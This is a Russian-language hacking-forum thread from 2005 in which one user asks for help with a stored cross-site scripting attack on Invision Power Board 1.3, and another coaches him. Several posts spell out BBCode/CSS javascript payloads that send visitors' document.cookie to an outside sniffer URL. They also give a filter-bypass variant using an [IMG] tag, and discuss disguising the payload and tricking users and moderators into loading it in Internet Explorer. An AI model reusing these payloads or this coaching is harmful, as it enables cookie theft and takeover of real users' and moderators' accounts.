Форумы Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р)

Discussion in 'Уязвимости CMS/форумов' started by FRTD, 17 Feb 2005.

  1. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
    Русский Модифицированный IPB v1.3 Final © 2003

    Вот пробовал получить хэш,а ни хрена
    пользовался:
    [COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR] также пробовал через Видео,но на логе не появляется информация.Почему,в чём я ошибся?

    З.Ы.я понимаю что такие вопросы вас задолбали,но в поиске я нихрена не нашёл=(
     
  2. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Вообщето это мой код, =) в конце K: =)

    У тебя должен быть IЕ и у них тоже.
    Или код измени только Алгол знает как.
     
    #2 ExpertLamer, 17 Feb 2005
    Last edited by a moderator: 19 Feb 2005
  3. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    тоесть вот так?[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie) [/COLOR]
    Что значит у них тоже?Это у кого?

    З.Ы.я не знаю чей это код,просто ходил по форуму и скопировал,я в этом слабо понимаю
     
  4. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Нет, у тебя какой браузер? Интернет эксплорер?
    Если нет, то не будит работать.
     
  5. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    у меня есть Опера,Фокс и Эксплор.Надо через эксплор?
     
  6. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    да.








    Или код менять.

    Алгол знает как.
     
  7. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    ща попробовал через эксплор...А если я выхожу и вхожу со своего компа в снифере это должно отобразиться?Чё то не показыватся
     
  8. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Непонил.
     
  9. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    ну смотри,я отправляю через эксплорер сообщение в форум [COLOR=]`style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie)[/COLOR]
    после этого по идее(как я понял)все входу пользователей должны фиксироваться тем,что на сниффер приходит инфа о кукизах итп.Значит если я выхожу из своего логина на форуме,а потом захожу обратно,инфа о моих пирожках тоже должна появится.Так?
    З.Ы.просто я не совсем догоняю весь этот процесс поэтому я могу что нить неправильно сказать(первый раз всё-таки)
     
  10. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Ну они должны посмотреть на страницу с снифером. И мой код используй.
     
  11. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    что то не выходит=(
    а если для маскировочки я напишу так:
    1)круто[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color]
    2)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
    это будет работать?Или (1) или (2)?

    З.Ы.мне зайти на...?
     
  12. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    нет не тебе. Util.

    1-й работает.
    Ты что то не правильно делаешь.

    На снифер
    HTML:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
    На алёрт.

    HTML:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]
    Фонт менять у меня не получается как вот тут и не кто помогать кроме UTIL не хочит. Все здохли чтоли?

    http://antichat.ru/txt/IPB/index1.php
     
  13. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    а как понять на алерт?Что это даёт?
     
  14. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Это ты сам должен посмотреть. Трудно тебе объяснить.

    Вот иди ко мне там пробуй и тесты проводи.

    http://www.whitejordan.ipbfree.com/

    Я White Jordan.

    Мне тут просто баннули ник.
     
    #14 ExpertLamer, 17 Feb 2005
    Last edited by a moderator: 17 Feb 2005
  15. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    похоже заработало частично,по крайней мере мой ИП и куки отображаются на сниффере, но нету реферера.Придётся завтра с утра пораньше отлавливать модеров=).Или что то опять неправильно?
    А что попробовать?Алерт тебе запостить?
     
    #15 FRTD, 17 Feb 2005
    Last edited: 17 Feb 2005
  16. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    да нет вродебы правельно.

    А вдруг у них не Интернет Эксплорер?
     
  17. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    а чё если у них не Эксплорер то сё накрылось?=(
     
  18. ExpertLamer

    ExpertLamer Guest

    Reputations:
    0
    Не, если у них ИЭ то БУДИТ работать, а если нет, то код будит видным и тебя поймают и 3 кода лишенния свободы.....................
     
  19. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    да то что код виден хер с ним.Главное чтобы куки отправились на снифф.Куки придут?
     
  20. FRTD

    FRTD New Member

    Joined:
    12 Feb 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    А если я после кода пропишу что нить то он будет работать?

    Становиться ещё интереснее!!!:)Хотел щас дописать приписку" [color=[IMG]http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/color] если у вас не отображается картинка,зайдите через Internet Explorer"(для очень доверчивых),а мне выдают:"незя использовать такой тег".Это по идее заплатка.Но почему она меня пропустила первый раз?
     
    #20 FRTD, 17 Feb 2005
    Last edited: 17 Feb 2005
Loading...